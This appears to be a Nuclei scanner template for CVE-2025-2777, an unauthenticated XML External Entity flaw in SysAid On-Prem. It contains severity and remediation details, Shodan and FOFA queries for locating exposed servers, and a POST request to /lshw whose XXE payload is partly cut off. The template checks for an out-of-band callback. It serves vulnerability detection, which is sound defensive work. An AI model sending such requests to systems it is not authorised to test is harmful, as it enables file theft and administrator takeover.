id: CVE-2025-2777 info: name: SysAid On-Prem <= 23.3.40 - XML External Entity author: johnk3r severity: critical description: | SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the lshw processing functionality, allowing for administrator account takeover and file read primitives. impact: | Unauthenticated attackers can exploit XXE vulnerabilities in the lshw endpoint to read arbitrary files, potentially leading to administrator account takeover and complete system compromise. remediation: | Upgrade to SysAid On-Prem version 24.40.60 or later that properly disables external entity processing. reference: - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ - https://documentation.sysaid.com/docs/24-40-60 classification: epss-score: 0.23107 epss-percentile: 0.96064 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L cvss-score: 9.3 cve-id: CVE-2025-2777 cwe-id: CWE-611 metadata: max-request: 1 vendor: sysaid product: sysaid shodan-query: http.favicon.hash:"1540720428" fofa-query: icon_hash=1540720428 tags: cve,cve2025,oast,sysaid,xxe,vkev,vuln variables: filename: "{{to_lower(rand_text_alpha(5))}}" http: - raw: - | POST /lshw?osVer=a&osCode=b&osKernel=c&agentVersion=e&serial=f HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml %foo; ]> matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 490a00463044022069c531a57a54816e1660333d59005faaf490966f4368b00310716c1e1ac1dce9022001448be682aab56a5874862c94c64018ac3a37fc4da62ae3d8ec304e4f070653:922c64590222798bb761d5b6d8e72950